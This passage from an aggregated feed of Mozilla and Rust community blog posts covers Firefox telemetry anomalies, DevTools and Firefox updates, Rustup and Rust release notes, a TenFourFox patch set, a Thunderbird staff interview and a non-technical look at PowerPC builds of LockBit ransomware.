I’d love to say those rules will be perfect on day one, but they won’t and we know they never will be. But we’re going to create a way to have a dialogue with the community we want to form, and to be open about what we’re learning. 

What’s most important to us is that the people who use our instance feel like their experience brings back more of what makes social great – and reduces the muck that has made it horrible. 

This will take us a while, especially because we’re committed to doing it in the open and with the community that already exists. Many other areas of the experience are ripe for experimentation – onboarding, discovery, identity, monetization just to name a few – so expect more from us soon. 

If you’re interested in joining mozilla.social as we continue to expand it, join our waitlist. Or get involved in your own way–join in, give feedback, create your own instance. We could not be more excited about this, and can’t wait to work with all of you to build something that’s better for all of humanity. 

The post The internet deserves a better answer to social appeared first on The Mozilla Blog.

William DurandMoziversary #5

Today is my fifth1 Moziversary 🎂 I joined Mozilla as a full-time employee on May 1st, 2018. I previously blogged in 2019, 2020, 2021, and 2022.

I spent a good chunk of last year working on Manifest Version 3 (MV3) with the rest of my team (WebExtensions / Add-ons team). My most notable “H1 2022” contributions were probably the scripting namespace and a simpler versioning format.

The extensions button and its panel (with 3 extensions listed) in Firefox.

Next, I worked on a new primary User Interface (UI) for Firefox Desktop: the extensions button. This feature wasn’t unanimously well-received2 3 (like many other changes to the Firefox UI). Anyway, I addressed different (usability) issues since then, and I will continue to do so!

I also…

But wait, there is more!

When I was on the AMO team, we had to maintain a feature named “Return to AMO” (RTAMO). In short, this feature allows new users interested in an add-on on addons.mozilla.org (AMO) to download Firefox and install the add-on when Firefox starts for the first time (without having to go back to AMO). RTAMO was extended to more add-ons at the beginning of 2022 (and I was involved). I became very knowledgeable about how attribution worked and documented all of that.

This is one of the reasons why I became the main owner4 of the stub attribution service, an HTTP server that encodes attribution data in Firefox (for Windows) installers and – incidentally – one of the few critical services involved when users download Firefox. Coincidentally, this project is now at the center of different 2023 projects. Good thing I took the time to put this project back on track 😛

Phew. That was a good year! I am now involved in many cross-functional projects and I really enjoy it. Speaking of which, I am currently working on bringing more add-ons to Firefox for Android 🚀

That’s all for now. Many thanks to everyone I worked with over the last 12 months, it’s been great working with all of you!

  1. 5 years or… 5 months? I moved back to France and my current employment contract started on January 1st, heh. Still better than nothing, though. 

  2. In case you didn’t know, many engineers read Reddit and/or other social platforms. I’ve shared actionable feedback from public comments internally more than once. That said, writing that the extensions button is the “worst Mozilla idea of the decade” isn’t helpful. 

  3. If I may, I would add that reaching out to me personally to say that you hate the button is probably not OK. 

  4. I am (still) trying to build a small team around this project and another one. If you want to join the fun, please let me know! 

Data@MozillaNever Look at the Data: Why did we start getting so many pings from Korea?

Something happened on January 5, 2023. All of a sudden we abruptly started receiving a number of pings from Firefox Desktop clients in Korea equal to two times the size of the entire Korean Firefox Desktop population.

What happened? How did we notice it? What did we do about it?

Let’s back up.

I can’t remember where I learned it, but I’d already started reciting as dogma in my first year of University: “The most important part about any feature is the ability to turn it off”. It’s served me well through my studies and my career. I’ve also found it to be especially true for data collection systems where, for whatever reason, as a user you might decide you no longer want the software you’re using to continue to send data. In some places this is even enshrined in laws where you can request the deletion of data that has already been collected.

Law or not, Mozilla has before, does now, and will always make it easy for you to decide whether to send data to Mozilla. We may not understand why you make that choice, and it definitely will make it harder for us to ensure our products meet your needs, but we’ll respect the heck out of your choice in our processes and in our products.

This is why, when Mozilla’s data collection system Glean is told the user went from allowing data upload to forbidding it, we send one final “deletion-request” ping before shutting down. The “deletion-request” ping contains all the internal identifiers we’ve used to longitudinally group data (if we receive ten crash reports it’s important to know whether it’s the same Firefox crashing ten times or if it’s ten Firefoxes crashing once), and we use those identifiers to (well) identify what data we’ve collected that we’re now going to delete.

For the purposes of this story you’ll need to know that there’s two times when Glean notices the product’s gone from “data upload: on” to “data upload: off”: while Glean is running, and during Glean startup. If Glean’s running, then we just handle things – we were told the setting changed from “data upload: on” to “data upload: off” and away we go. But Glean knows that it isn’t always listening to the data upload setting, so if it it starts up with “data upload: off” and the last time it shut down we were “data upload: on” we’ll send a specific “at_init”-reason “deletion-request” ping.

We in the Data Org monitor how Glean is behaving. One thing we’ve learned about how Glean behaves is that the number of “deletion-request” pings is roughly constant over time. And the proportion of “deletion-request” pings that have the “at_init” reason should remain a fairly fixed one.

What shouldn’t happen is for Firefox Desktop-sent “at_init”-reason “deletion-request” pings to spike like this on January 5:

 

time-series plot of ping volumes from December 2022 until mid-January 2023 showing abnormal abrupt increases in volume starting on January 5.

 

What we do when we notice things like this is file a bug. As the one responsible for Glean’s integration in Firefox Desktop, and as someone with a long history of looking into anomalies, I took a look. At this initial point I was pretty sure it’d be a single actor (a single user, a single company, a single internet cafe) doing something odd… but alas, the evidence was inconclusive:

Evidence consistent with a single actor being responsible for it all:

  • All the pings were coming from the same internet provider. Korea Telecom is responsible for a bare majority of Firefox Desktop data delivery from Korea, but the spikes were entirely from that ISP.
  • The Mozilla Community in Korea could offer no explanation of any wide-spread computer or software event that matched the timeline.
  • “at_init”-reason “deletion-request” pings could be a result of automation changing the files on disk to read “data upload: off” between runs of Firefox Desktop.

Evidence inconsistent with a single actor being responsible for it all:

  • The data came from a mix of Firefox Desktop versions: versions 101.0.1, 104.0, and 108.0.2.
  • The data came from a range of different regions, more or less following the population density of Korea itself.
  • “at_init”-reason “deletion-request” pings could instead be the result of users changing the setting to “data upload: off” early enough during Firefox Desktop startup that Glean hasn’t yet been initialized.

Regardless of why it was happening, it quickly became more important that we learn what we needed to do about it. We spun up an Incident, which is how we organize ourselves when there’s something happening that requires cross-functional collaboration and isn’t getting better on its own. Once there we ascertained that we could respond very quickly and decisively and do

Nothing at all.

The volume of these pings vastly eclipsed any other “deletion-request” pings we would otherwise have received, so you’d be forgiven for thinking that it was terribly expensive to receive, store, and process them all. In reality, we batch these requests. And even before this spike, every batch of requests required editing every partition of every table. Adding another list of identifiers to delete equal in size to two times the peak Firefox Desktop population in Korea just doesn’t matter all that much.

The pressure was off. Even if it got worse… which it did:

Time-series plot of "deletion-request" pings isolated to just those from Korea. Spikes begin January 25 and dwarf other reports. A plateau begins March 26 and continues to the right edge of the plot around April 10.

 

On March 26, when it reached and maintained a peak of five times the volume of the Firefox Desktop population in Korea, it still wasn’t harming our data platform’s ability to serve business needs or costing us all that much in operational spend. We didn’t need to invest effort into running down the source, so we didn’t.

And so I just kept an occasional eye on it until, just as suddenly but not quite as abruptly as it began, on April 12 the ping volumes began to decrease. By April 18, we were back to normal levels.

Time-series plot of "deletion-request" pings isolated to just those from Korea. Very similar to the previous plot, but continues until April 18. Spikes begin January 25 and dwarf other reports. A plateau begins March 26 and stays up there until April 12 when falls away to nothing over the course of five days or so.

 

We had successfully ignored it until it went away.

So what happened to Korean Firefox Desktop users from Jan 5 to April 12, 2023? We never figured it out. If you know about something happening across those dates in Korea: please get in touch. As little as it needed solving for the sake of business needs, it still needs solving for the sake of my curiosity.

:chutten

(( This is a syndicated copy of the original post. ))

Chris H-CNever Look at the Data: Why did we start getting so many pings from Korea?

Something happened on January 5, 2023. All of a sudden we abruptly started receiving a number of pings from Firefox Desktop clients in Korea equal to two times the size of the entire Korean Firefox Desktop population.

What happened? How did we notice it? What did we do about it?

Let’s back up.

I can’t remember where I learned it, but I’d already started reciting as dogma in my first year of University: “The most important part about any feature is the ability to turn it off”. It’s served me well through my studies and my career. I’ve also found it to be especially true for data collection systems where, for whatever reason, as a user you might decide you no longer want the software you’re using to continue to send data. In some places this is even enshrined in laws where you can request the deletion of data that has already been collected.

Law or not, Mozilla has before, does now, and will always make it easy for you to decide whether to send data to Mozilla. We may not understand why you make that choice, and it definitely will make it harder for us to ensure our products meet your needs, but we’ll respect the heck out of your choice in our processes and in our products.

This is why, when Mozilla’s data collection system Glean is told the user went from allowing data upload to forbidding it, we send one final “deletion-request” ping before shutting down. The “deletion-request” ping contains all the internal identifiers we’ve used to longitudinally group data (if we receive ten crash reports it’s important to know whether it’s the same Firefox crashing ten times or if it’s ten Firefoxes crashing once), and we use those identifiers to (well) identify what data we’ve collected that we’re now going to delete.

For the purposes of this story you’ll need to know that there’s two times when Glean notices the product’s gone from “data upload: on” to “data upload: off”: while Glean is running, and during Glean startup. If Glean’s running, then we just handle things – we were told the setting changed from “data upload: on” to “data upload: off” and away we go. But Glean knows that it isn’t always listening to the data upload setting, so if it it starts up with “data upload: off” and the last time it shut down we were “data upload: on” we’ll send a specific “at_init”-reason “deletion-request” ping.

We in the Data Org monitor how Glean is behaving. One thing we’ve learned about how Glean behaves is that the number of “deletion-request” pings is roughly constant over time. And the proportion of “deletion-request” pings that have the “at_init” reason should remain a fairly fixed one.

What shouldn’t happen is for Firefox Desktop-sent “at_init”-reason “deletion-request” pings to spike like this on January 5:

time-series plot of ping volumes from December 2022 until mid-January 2023 showing abnormal abrupt increases in volume starting on January 5.

What we do when we notice things like this is file a bug. As the one responsible for Glean’s integration in Firefox Desktop, and as someone with a long history of looking into anomalies, I took a look. At this initial point I was pretty sure it’d be a single actor (a single user, a single company, a single internet cafe) doing something odd… but alas, the evidence was inconclusive:

Evidence consistent with a single actor being responsible for it all:

  • All the pings were coming from the same internet provider. Korea Telecom is responsible for a bare majority of Firefox Desktop data delivery from Korea, but the spikes were entirely from that ISP.
  • The Mozilla Community in Korea could offer no explanation of any wide-spread computer or software event that matched the timeline.
  • “at_init”-reason “deletion-request” pings could be a result of automation changing the files on disk to read “data upload: off” between runs of Firefox Desktop.

Evidence inconsistent with a single actor being responsible for it all:

  • The data came from a mix of Firefox Desktop versions: versions 101.0.1, 104.0, and 108.0.2.
  • The data came from a range of different regions, more or less following the population density of Korea itself.
  • “at_init”-reason “deletion-request” pings could instead be the result of users changing the setting to “data upload: off” early enough during Firefox Desktop startup that Glean hasn’t yet been initialized.

Regardless of why it was happening, it quickly became more important that we learn what we needed to do about it. We spun up an Incident, which is how we organize ourselves when there’s something happening that requires cross-functional collaboration and isn’t getting better on its own. Once there we ascertained that we could respond very quickly and decisively and do

Nothing at all.

The volume of these pings vastly eclipsed any other “deletion-request” pings we would otherwise have received, so you’d be forgiven for thinking that it was terribly expensive to receive, store, and process them all. In reality, we batch these requests. And even before this spike, every batch of requests required editing every partition of every table. Adding another list of identifiers to delete equal in size to two times the peak Firefox Desktop population in Korea just doesn’t matter all that much.

The pressure was off. Even if it got worse… which it did:

Time-series plot of "deletion-request" pings isolated to just those from Korea. Spikes begin January 25 and dwarf other reports. A plateau begins March 26 and continues to the right edge of the plot around April 10.

On March 26, when it reached and maintained a peak of five times the volume of the Firefox Desktop population in Korea, it still wasn’t harming our data platform’s ability to serve business needs or costing us all that much in operational spend. We didn’t need to invest effort into running down the source, so we didn’t.

And so I just kept an occasional eye on it until, just as suddenly but not quite as abruptly as it began, on April 12 the ping volumes began to decrease. By April 18, we were back to normal levels.

Time-series plot of "deletion-request" pings isolated to just those from Korea. Very similar to the previous plot, but continues until April 18. Spikes begin January 25 and dwarf other reports. A plateau begins March 26 and stays up there until April 12 when falls away to nothing over the course of five days or so.

We had successfully ignored it until it went away.

So what happened to Korean Firefox Desktop users from Jan 5 to April 12, 2023? We never figured it out. If you know about something happening across those dates in Korea: please get in touch. As little as it needed solving for the sake of business needs, it still needs solving for the sake of my curiosity. 

:chutten

Firefox Developer ExperienceFirefox DevTools Newsletter — 112-113

Developer Tools helps developers write and debug websites on Firefox. This newsletter gives an overview of the work we’ve done as part of the Firefox 112 and 113 Nightly release cycles.

Firefox 112

Firefox being an open source project, we are grateful to get contributions from people outside of Mozilla

  • Christian Sonne landed a patch to display subgrid in the auto-complete suggestions for grid-template-* and grid properties in the Rules View (bug)
    screenshot of the inspector rule view where a `grid-template-columns` is being added, and the value input has an autocomplete list that includes a `subgrid` item (amongst other)
  • There are several ways to take screenshots from DevTools and thanks to Connor Pearson, they are now placed in the images folder on OSX (bug)

DevTools are written in HTML, CSS and JS so any web developer can contribute! Read how to setup the work environment and check the list of mentored issues


linear() is a new animation timing function that landed in 112 (MDN) and Nicolas added a widget to modify its arguments (bug)

  • double clicking on a point will remove it
  • double clicking anywhere else will add one
  • points can be moved with drag and drop
  • holding Shift will snap the point to the grid
In the rule view, there's a `animation-timing-function` property whose value is `linear(0, 0.8, 0.2, 1)` An button, displayed before the value, was clicked, and a modal is displayed with a chart onto which the values of the linear function are plotted and connected with straight lines<figcaption class="wp-element-caption">The new linear widget makes it easier to tweak animation timing function</figcaption>

Brad improved performance of the grid highlighter (bug) and Alex made some interaction in the debugger 10% faster (> 10% improvements)

We also fixed a few bugs in the tools:

  • Emilio fixed an issue that would leave the page in a weird state when closing Responsive Design Mode (bug)
  • The “Disable JavaScript” feature was fixed by Julian (bug)
  • Julian recovered a regression that broke network throttling in Netmonitor (bug)
  • Alex made it possible to copy text from Netmonitor HTML preview again (bug)
  • Hubert also fixed an issue with Navigator.sendBeacon requests that were shown as Blocked in the Netmonitor even if they went through (bug)

Firefox 113

We got awesome help from external contributors:

  • Masashi Hirano added support for BigInt in console API methods (bug)
  • zacnomore improved the display of our pseudo class panel (bug)

Since the beginning of the year, we have been working on features that would help the Web Compatibility team, and hopefully those should benefit all web developers who need to debug websites in production.

The main feature we added is the ability to override a script from the debugger (bug).

In the Sources tree, a “Add script override” context menu entry was added. It will download the file on your machine, so it can be edited, and then after reloading, the local file is the script that will be used in the page (a purple icon indicates when a file is overridden)

The debugger source tree is displayed, with a Javascript file, App.js, being focused. The context menu is displayed for this file, and has a "Add script override" entry which is selected

Hubert also landed a lot of improvements for the Debugger “Search in files” feature (aka “Project search”). The panel was moved to a regular side panel, which allows to keep the results list visible while opening scripts in the editor (bug)

In the debugger, there's a side panel on the left side with three tabs, "Sources", "Outline" and "Search". The "Search" tab is active and shows a search input, the number of results, modifier buttons and a filter for files to exclude. Below, actual search results are shown with the matches being highlighted

We now show results from minified and pretty-printed tabs (bug), as well as matches from node_modules folder  (bug), and we hide results from files that are ignored (bug)

Ignoring files in the Debugger means you won’t step into this file. It can be useful when debugging page built with frameworks so you can focus only on your code. Read how you can ignore files in the Debugger: https://firefox-source-docs.mozilla.org/devtools-user/debugger/how_to/ignore_a_source/index.html

Project search now also supports glob patterns (bug) and search modifiers (bug), so you can do case-sensitive or regex search on specific parts of your project.

We also spent some time on the Debugger “Pretty-Print” feature

At the beginning of the year, a performance test was added so we can check how our work might impact pretty printing performance, and so we were able to assert that we made it almost twice faster than before (bug, bug, bug)

A chart plotting pretty performance from January to April. From January to February, values are stable and around 550ms From beginning of February to mid February, values are around 300ms From mid February to March, values are around 700ms From March to April, values are back to 300ms

We added support for pretty printing inline scripts in HTML file (bug) and made it possible to add column breakpoints to any pretty printed source (bug)

comparison of the debugger text editor before and after pretty printing an HTML file. Before, the inline scripts have single line content. After pretty printing, the inline scripts spans multiple lines and are indented properly.

Alex improved logging of DOMException and Components.Exception , showing a nicely formatted stacktrace (bug)

Side by side comparison of the console output before and after the fix mentioned. Before, we can see a "DOMException: DOMException 💥" error, without stack trace. After, the same exception has some useful trace

Bug fixes:

  • Julian fixed the network monitor performance analysis tools (bug)
  • Julian made the simplified highlighter for prefers-reduced-motion optional (bug)
  • Nicolas fixed inconsistencies with highlighter icons in various DevTools (bug)
  • Nicolas fixed a recent regression which excluded timestamps from console messages when using Copy All Messages / Save All Messages to File (bug)
  • Nicolas made it possible to see and tweak ::backdrop styles from the inspector (bug)
In the rule view, a `dialog::backdrop` rule is displayed under a "Pseudo-elements" section

Firefox NightlyHarder, Better, Faster, Stronger, Prettier – These Weeks in Firefox: Issue 136

Highlights

Friends of the Firefox team

Introductions/Shout-Outs

  • [:mcheang] I’d like to introduce Marc Seibert [:mseibert] our student worker from Berlin! 🥳

Resolved bugs (excluding employees)

Script to find new contributors from bug list

Volunteers that fixed more than one bug
  • CanadaHonk [:canadahonk]
  • Ebilite Uchenna
  • Itiel
  • Noah Osuolale
  • portiawuu
  • Victoria Ajala
New contributors (🌟 = first patch)

Project Updates

Developer Tools

DevTools
  • External contributors
    • Ivan simplified InactivePropertyHelper#hasVerticalWritingMode (bug)
    • jynk.zilla improved our shared Tab component so selecting a Tab in the overflow panel would make it visible in the Tab bar (bug)
    • omid rad fixed the “copy as cURL” context menu action so the resulting command includes –compressed when the response is compressed (bug)
    • Masashi Hirano added support for BigInt for console API format specifier so we conform to the specification (bug)
      • console.log(“Value: %d”, 42n) -> Value: 42
      • console.log(“Value:”, 42n) -> Value: 42n
  • Contributions from other teams:
    • arai added RegExp static, Function, Intl.Locale and Error.prototype.stack to the eager evaluation allow list (bug)
    • emilio simplified the inspector walker implementation (bug), which brought a nice 10 to 15% improvement in inspector performance tests
  • Alex added a keyboard shortcut to toggle JS tracing (Ctrl+Shift+5) (bug)
  • Alex also made it possible to programmatically toggle the tracer in privileged code (bug)

const {

  startTracing,

  stopTracing,

} = ChromeUtils.import("resource://devtools/server/tracer/tracer.jsm");

 

startTracing({ prefix: "testPrefix" });

...

stopTracing();

  • Alex cleaned up the debugger frontend redux store (bug, bug), which led to a ~ 15% improvement in Browser Toolbox debugger test
  • Julian introduced and then fixed a bug in Netmonitor for HTTP/3 responses (bug), which he took as an opportunities to add a test for HTTP3, and he’s currently investigating how we could run most of the netmonitor tests with HTTP/3 responses
  • Nicolas fixed a bug where logging/expanding objects in the console would lead to warning messages (bug)
  • Nicolas made it possible to style ::backdrop pseudo-element in the inspector (bug)
    • The Firefox DevTools Inspector is shown with the DOM tree on the left, and the Style pane on the right. A element is being inspected, and a rule matching on the backdrop pseudo-element is displayed setting the background of the dialog to rebeccapurple.

      If your name is “Rebecca”, this one is for you.

WebDriver BiDi
  • Sasha added support for the input.releaseActions command (bug, spec) used to release all the keys and pointer buttons that are currently depressed (via input.performActions)
  • Browsertime performed more tests using the BiDi-based HAR generator, with significantly reduced overhead compared to the DevTools-based solution (bug)
  • Julian fixed an issue on load and domContentLoaded events by using document url instead of document baseUri (bug)
  • Henrik improved navigation timeout error message (bug)

ESMification status

  • Conversions have continued at a good place with some big jumps.
  • Converting modules used in workers is waiting on ES module workers to ship.
  • ESMified status:
    • browser: 60.78%
    • toolkit: 78%
    • Total: 74.6% (up from 66.4%)
  • #esmification on Matrix
  • Migration Document (with a walkthrough!)

Lint, Docs and Workflow

  • The work to separate Prettier from ESLint has now landed.
    • It should generally function in a similar way to before, but your editor won’t complain about formatting issues.
    • If you use VS Code, consider running ./mach ide vscode again which will set the relevant preferences.
  • We are planning on upgrading Prettier, and enabling on xhtml/html/json formats in the Firefox 115 cycle.

Migration Improvements (CalState LA Project)

Picture-in-Picture

Search and Navigation

Congrats to our student, Marc for landing his first few bugs on search and address bar! Great job! 🎉

Search
SERP Telemetry
Address Bar

Storybook / Reusable components

The Rust Programming Language BlogAnnouncing Rustup 1.26.0

The rustup working group is happy to announce the release of rustup version 1.26.0. Rustup is the recommended tool to install Rust, a programming language that is empowering everyone to build reliable and efficient software.

If you have a previous version of rustup installed, getting rustup 1.26.0 is as easy as stopping any programs which may be using Rustup (e.g. closing your IDE) and running:

rustup self update

Rustup will also automatically update itself at the end of a normal toolchain update:

rustup update

If you don't have it already, you can get rustup from the appropriate page on our website.

What's new in rustup 1.26.0

This version of Rustup involves a significant number of internal cleanups, both in terms of the Rustup code and its tests. In addition to a lot of work on the codebase itself, due to the length of time since the last release this one has a record number of contributors and we thank you all for your efforts and time.

The headlines for this release are:

  1. Add rust-analyzer as a proxy of rustup. Now you can call rust-analyzer and it will be proxied to the rust-analyzer component for the current toolchain.

  2. Bump the clap dependency from 2.x to 3.x. It's a major version bump, so there are some help text changes, but the command line interface is unchanged.

  3. Remove experimental GPG signature validation and the rustup show keys command. Due to its experimental status, validating the integrity of downloaded binaries did not rely on it, and there was no option to abort the installation if a signature mismatch happened. Multiple problems with its implementation were discovered in the recent months, which led to the decision to remove the experimental code. The team is working on the design of a new signature validation scheme, which will be implemented in the future.

Full details are available in the changelog!

Rustup's documentation is also available in the rustup book.

Thanks

Thanks again to all the contributors who made rustup 1.26.0 possible!

  • Daniel Silverstone (kinnison)
  • Sabrina Jewson (SabrinaJewson)
  • Robert Collins (rbtcollins)
  • chansuke (chansuke)
  • Shamil (shamilsan)
  • Oli Lalonde (olalonde)
  • 二手掉包工程师 (hi-rustin)
  • Eric Huss (ehuss)
  • J Balint BIRO (jbalintbiro)
  • Easton Pillay (jedieaston)
  • zhaixiaojuan (zhaixiaojuan)
  • Chris Denton (ChrisDenton)
  • Martin Geisler (mgeisler)
  • Lucio Franco (LucioFranco)
  • Nicholas Bishop (nicholasbishop)
  • SADIK KUZU (sadikkuzu)
  • darkyshiny (darkyshiny)
  • René Dudfield (illume)
  • Noritada Kobayashi (noritada)
  • Mohammad AlSaleh (MoSal)
  • Dustin Martin (dmartin)
  • Ville Skyttä (scop)
  • Tshepang Mbambo (tshepang)
  • Illia Bobyr (ilya-bobyr)
  • Vincent Rischmann (vrischmann)
  • Alexander (Alovchin91)
  • Daniel Brotsky (brotskydotcom)
  • zohnannor (zohnannor)
  • Joshua Nelson (jyn514)
  • Prikshit Gautam (gautamprikshit1)
  • Dylan Thacker-Smith (dylanahsmith)
  • Jan David (jdno)
  • Aurora (lilith13666)
  • Pietro Albini (pietroalbini)
  • Renovate Bot (renovate-bot)

Tiger OakesAlternatives to the resize event with better performance

Exploring other APIs that integrate closely with the browser's styling engine.

Cameron KaiserApril patch set for TenFourFox

As promised, there are new changesets to pick up in the TenFourFox tree. (If you're new to rolling your own TenFourFox build, these instructions still generally apply.) I've tried to limit their scope so that people with a partial build can just pull the changes (git pull) and gmake -f client.mk build without having to "clobber" the tree (completely erase and start over). You'll have to do that for the new ESR when that comes out in a couple months, but I'll spare you that today. Most of these patches are security-related, including one that prevents naughty cookies which would affect us as well, though the rest are mostly crash-preventers and would require PowerPC-specific attacks to be exploitable. There is also an update to the ATSUI font blacklist. As always, if you find problematic fonts that need to be suppressed, post them to issue 566 or in the comments, but read this first.

However, there is one feature update in this patchset: a CSS grid whitelist. Firefox 45, which is the heavily patched underpinning of TenFourFox FPR, has a partially working implementation of CSS grid as explained in this MDN article. CSS grid layout is a more flexible and more generalized way of putting elements on a page than the earlier tables method. Go ahead and try to read that article with the current build before you pull the changes and you'll notice that the page has weirdly scrunched up elements (before a script runs and blanks the whole page with an error). After you build with the updates, you'll notice that while the page still doesn't lay out perfectly right, you can now actually read things. That's because there's a whitelist entry now in TenFourFox that allows grid automatically on developer.mozilla.org (a new layout.css.grid.host.developer.mozilla.org preference defaults to true which is checked for by new code in the CSS parser, and there is also an entry in the problematic scripts filter to block the script that ends up blanking the page when it bugs out). The other issues on that page are unrelated to CSS grid.

This will change things for people who set the global pref layout.css.grid.enabled to true, which we have never shipped in TenFourFox because of (at times significant) bugs in the implementation. This pref is now true, but unless the URL hostname is in the whitelist, CSS grid will still be disabled dynamically and is never enabled for chrome resources. If you set the global pref to false, however, then CSS grid is disabled everywhere. If you were using this for a particular site that lays out better with grid on, post the URL to issue 659 or in the comments and I'll consider adding it to the default set (or add it yourself in about:config).

The next ESR (Firefox 115) comes out end of June-early July, and we'll do the usual root updates then.

The Rust Programming Language BlogAnnouncing Rust 1.69.0

The Rust team is happy to announce a nice version of Rust, 1.69.0. Rust is a programming language empowering everyone to build reliable and efficient software.

If you have a previous version of Rust installed via rustup, you can get 1.69.0 with:

rustup update stable

If you don't have it already, you can get rustup from the appropriate page on our website, and check out the detailed release notes for 1.69.0 on GitHub.

If you'd like to help us out by testing future releases, you might consider updating locally to use the beta channel (rustup default beta) or the nightly channel (rustup default nightly). Please report any bugs you might come across!

What's in 1.69.0 stable

Rust 1.69.0 introduces no major new features. However, it contains many small improvements, including over 3,000 commits from over 500 contributors.

Cargo now suggests to automatically fix some warnings

Rust 1.29.0 added the cargo fix subcommand to automatically fix some simple compiler warnings. Since then, the number of warnings that can be fixed automatically continues to steadily increase. In addition, support for automatically fixing some simple Clippy warnings has also been added.

In order to draw more attention to these increased capabilities, Cargo will now suggest running cargo fix or cargo clippy --fix when it detects warnings that are automatically fixable:

warning: unused import: `std::hash::Hash`
 --> src/main.rs:1:5
  |
1 | use std::hash::Hash;
  |     ^^^^^^^^^^^^^^^
  |
  = note: `#[warn(unused_imports)]` on by default

warning: `foo` (bin "foo") generated 1 warning (run `cargo fix --bin "foo"` to apply 1 suggestion)

Note that the full Cargo invocation shown above is only necessary if you want to precisely apply fixes to a single crate. If you want to apply fixes to all the default members of a workspace, then a simple cargo fix (with no additional arguments) will suffice.

Debug information is not included in build scripts by default anymore

To improve compilation speed, Cargo now avoids emitting debug information in build scripts by default. There will be no visible effect when build scripts execute successfully, but backtraces in build scripts will contain less information.

If you want to debug a build script, you can add this snippet to your Cargo.toml to emit debug information again:

[profile.dev.build-override]
debug = true
[profile.release.build-override]
debug = true

Stabilized APIs

These APIs are now stable in const contexts:

Other changes

Check out everything that changed in Rust, Cargo, and Clippy.

Contributors to 1.69.0

Many people came together to create Rust 1.69.0. We couldn't have done it without all of you. Thanks!

Mozilla ThunderbirdMeet The Team: Wolf-Martell Montwe, Android Developer

Welcome to a brand new feature called “Meet The Team!” In this ongoing series of conversations, I introduce you to the people behind the software you use every day. We kicked things off by talking to Thunderbird’s Product Design Manager Alex Castellani. Now let’s meet someone much newer to the team: Wolf-Martell Montwe.

Having recently joined us from Berlin as a full-time Android developer, Wolf brings his passion for building mobile applications to the Thunderbird team. He’ll be helping to develop new features and an updated interface for K-9 Mail as we transform it into Thunderbird for Android. I spoke with him about his first computer and early gaming memories, what he hopes to accomplish for the Thunderbird mobile app, and how our community of contributors can help.

<figcaption class="wp-element-caption">Catch up on the “Meet The Team” series by reading my conversation with Alex Castellani</figcaption>

Wolf’s Technology Origin Story

I love a great origin story, and many people working in technology seem to have one that’s directly tied to their first computer. Wolf is no exception.

“I think I started my computer journey with playing games — the first I remember is Sid Meier’s Pirates!” Wolf remembers. “Back then I had an IBM 386. Super slow, super loud! And I hacked around a lot to get games running too, to free up memory, to free up disk space because this was super limited. I think one partition was maximum 3MB! It was a big achievement if something just was running.”

Wolf’s fascination with games eventually led to some basic programming knowledge and web page development.

“I used to develop web pages, especially for my school to build up like a little forum,” he says. “I fell in love with PHP because it had one of the first editors with code completion, and that was awesome.”

What Attracted Wolf To The Thunderbird Project?

“I’m a longtime Thunderbird user, and I have used K-9 Mail from 2010 on,” Wolf says. “In my last position, my task was to build up open source software. (So we developed the software and then prepared it to be open source, because the code was readable, but people couldn’t contribute.) And over that time I fall in love with developing open source, so I was looking for opportunities to to follow up on that direction. “

The Thunderbird Android Team Just Doubled In Size. Now What?

Believe it or not, for many years K-9 Mail had one full-time developer (in addition to a community of contributors). So, Wolf effectively doubles the size of the core team. The first questions that came to mind: what doors does this open to the future of Thunderbird for Android, and what can Wolf and cketti accomplish during the next few months?

“First, I want to strengthen the technology base and also open it up for using more modern tooling, especially because the whole Android ecosystem is right now under a really drastic change,” Wolf explains. “It could be pretty beneficial for the project since it’s being rebranded, and think it’s good timing to then also adapt new technology and base everything on that.”

(The desktop version of Thunderbird is undergoing a similar transformation, as we slowly rebuild it with more modern tooling while eliminating years of technical debt.)

Wolf continues: “I think that would also open the Android app to be a little bit easier maintain from a UI side, because right now it is hard to achieve.”

It’s certainly easier for our developers — and our global team of community contributors — to improve an application and more easily add new features when the code isn’t fighting against them.

How Can The Community Help?

There’s so much we can do to contribute to open source software besides writing code. So I asked Wolf: what’s the most important thing the K-9 Mail and Thunderbird community can do to help development?

“Constructive feedback on what we’re doing,” Wolf says. “Whether it’s positive or negative, I think that’s important. But please be nice!”

We certainly encourage everyone on Android to try K-9 Mail as we continue its transformation to Thunderbird. When you’re ready to give feedback or suggest ideas, we invite you to join our Thunderbird Android Planning mailing list, which is open to the public.


Talk to Wolf on Mastodon, and follow him on GitHub.

Download K-9 Mail: F-Droid | Play Store | GitHub.

The post Meet The Team: Wolf-Martell Montwe, Android Developer appeared first on The Thunderbird Blog.

IRL (podcast)Bonus Episode

We have good news to share. IRL: Online Life is Real Life has been nominated for two Webby Awards: one for Public Service and Activism and another for Technology.  We need your help.  We’d love it if you could go to the links below and vote for us.  It’s quick and easy!  Voting ends on Thursday, April 20th at midnight PDT. 

Vote for IRL in the Webby Awards: Technology and Public Service Activism 

It means so much to spotlight the voices and stories of folks who are making AI more trustworthy in real life, and we love to see them celebrated! 

Thanks for your vote and for listening to IRL!
 

 

 

 

 

Cameron KaiserPower Mac ransomware? Yes, but it's complicated

Wired ran an article today (via Ars Technica) about apparent macOS-compatible builds of LockBit, a prominent encrypting ransomware suite, such as this one for Apple silicon. There have been other experimental ransomware samples that have previously surfaced but this may be the first known example of a prominent operation specifically targeting Macs, and it is almost certainly not the last.

What caught my eye in the article was a report of PowerPC builds. I can't seem to get an alleged sample to analyse (feel free to contact me at ckaiser at floodgap dawt com if you can provide one) but the source for that assertion appears to be this tweet.

Can that file run on a Power Mac? It appears it's indeed a PowerPC binary, but the executable format is ELF and not Mach-O, so the file can only run natively on Linux or another ELF-based operating system, not PowerPC Mac OS X (or, for that matter, Mac OS 9 and earlier). Even if the raw machine code were sprayed into memory for an exploitable Mac application to be tricked into running, ELF implies System V ABI, which is similar but different from the PowerOpen ABI used for PowerPC-compatible versions of Mac OS, and we haven't even started talking about system calls. Rather than a specific build targetting Power Macs, most likely this is evidence that the LockBit builders simply ran every crosscompiler variation they could find on their source code: there are no natively little-endian 32-bit PowerPC CPUs, for example, yet there's a ppcle build visible in the screenshot. Heck, there's even an s390x build. Parents, don't let your mainframes out unsupervised.

This is probably a good time to mention that I've been working on security patches for TenFourFox and a couple minor feature adjustments, so stay tuned. It's been awhile but such are hobbies.

Support.Mozilla.OrgWhat’s up with SUMO – Q1 2023

Hi everybody,

I know some of you have been asking about the monthly blog post since January. We’re back today, with a summary of what happened in the past 3 months. This will be our new cadence for this kind of post. So please look out for our next edition by early July.

I hope the past 3 months have treated you well. Time surely flies so fast. We’ve done a lot of internal research for the past 3 months, but in Q2, I promise you will see more of me all around our various community channels.

